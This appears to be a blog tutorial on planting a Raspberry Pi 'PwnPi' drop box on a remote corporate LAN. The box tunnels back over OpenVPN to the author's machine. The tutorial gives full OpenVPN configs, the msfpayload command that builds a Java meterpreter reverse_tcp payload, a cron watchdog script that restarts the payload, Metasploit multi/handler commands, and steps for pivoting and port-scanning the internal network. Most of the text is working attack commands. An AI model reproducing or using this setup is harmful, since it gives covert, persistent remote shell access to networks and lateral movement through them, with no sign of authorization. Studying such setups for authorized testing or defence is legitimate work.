reverse java-meterpreter

Setup:

  • A Windows 7 box with OpenVPN server runnning
    (192.168.0.10; 10.0.0.1)
  • Backtrack 5 (Virtualbox on my Win7 server) connected as OpenVPN client via lan
    (192.168.0.60; 10.0.0.4)
  • PwnPi conncted as OpenVPN client to the Win7 server via internetz
    (gets ip form dhcp on the remote lan[corporate]; 10.0.0.3)

First setup a openvpn server. This is my server.ovpn config file:

local 192.168.0.10
port 4567
proto udp
mode server
dev tap
dev-node openvpn
tun-mtu 1500
ifconfig 10.0.0.1 255.255.255.0
ifconfig-pool 10.0.0.2 10.0.0.9
client-to-client
tls-server
dh   x:\\openvpn\\keys\\dh1024.pem
ca   x:\\openvpn\\keys\\ca.crt
key  x:\\openvpn\\keys\\server.key
cert x:\\openvpn\\keys\\server.crt
client-config-dir x:\\openvpn\\ccd
comp-lzo
push „route-gateway 10.0.0.1“

status „X:\\openvpn\\log\\openvpn-status.log“
log „X:\\openvpn\\log\\openvpn.log“
log-append „X:\\openvpn\\log\\openvpn.log“
verb 5

Second step is, generating keys for server and client. I won’t go into that, just google
or take a look here.

cat /etc/openvpn/client.conf

client
dev tap
proto udp
remote YOURHOSTNAMEHERE YOURPORTHERE
#note: for bt use lan ip, for pwnpi a dyndns
resolv-retry infinite
nobind
persist-key
persist-tun
ca /etc/openvpn/ca.crt
key /etc/openvpn/*.key
cert /etc/openvpn/*.crt
compo-lzo
verb 6
mute 50
log /var/log/openvpn.log
tun-mtu 1500

I’m going this way, because i want to use metasploit on my local BackTrack box, accessing the remote network via pwnpi. Using metasploit directly on the PwnPi is ridiculously slow, especially over tor.
Going this way brings also the option of using Armitage on the Backtrack machine.
I also want to use meterpreter, because it has nice pivoting features.
So i created a java\meterpreter\reverse_tcp payload and running it on PwnPi startup,
connecting to my Backtrack machine via OpenVPN lan. Since pwnpi 3.0 comes with metasploit preinstalled, just cd /pentest/exploits/framework3/ and type:

./msfpayload java/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4444 R > /root/meterpreter.jar

I made another lazy script to fire up and keep the meterpreter payload running:

#!/bin/sh
SERVICE=’java‘
if ps ax | grep -v grep | grep -v $0 | grep $SERVICE > /dev/null
then
#    echo „OPENVPNTUNNEL running, everything is fine“
echo „`date`:  OPENVPNTUNNEL running“ >> /root/java.log
else
echo „OPENVPNTUNNEL is not running“
echo „Starting service“
bash /root/startjava
echo „`date`: OPENVPNTUNNEL not running – Starting now!“ >> /root/java.log
fi

Save it as checkjava

java -jar /root/meterpreter.jar

Save it as startjava

Next step is creating a cronjob, checking if meterpreter is running.

0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58 * * * * bash /root/checkjava

Make sure to enable OpenVPN on startup. So the PwnPi should now be able to connect to our virtual network and running the meterpreter payload on startup.

meterpreter.listen

Now go to your BackTrack box and start Armitage. Run a multi/handler with java/meterpreter/reverse_tcp payload.

use multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.0.0.4
set LPORT 4444
exploit

Now power up the PwnPi and watch the m451c happen !!!1!
meterpreter.connected

Now setup a pivot via metasploit and scan the new ip range for other devices. Since run arp_scanner won’t work on java\meterpreter, i’m going to use portscan_tcp.

meterpreter.pivot.portscan.2

Voilà!

<eof>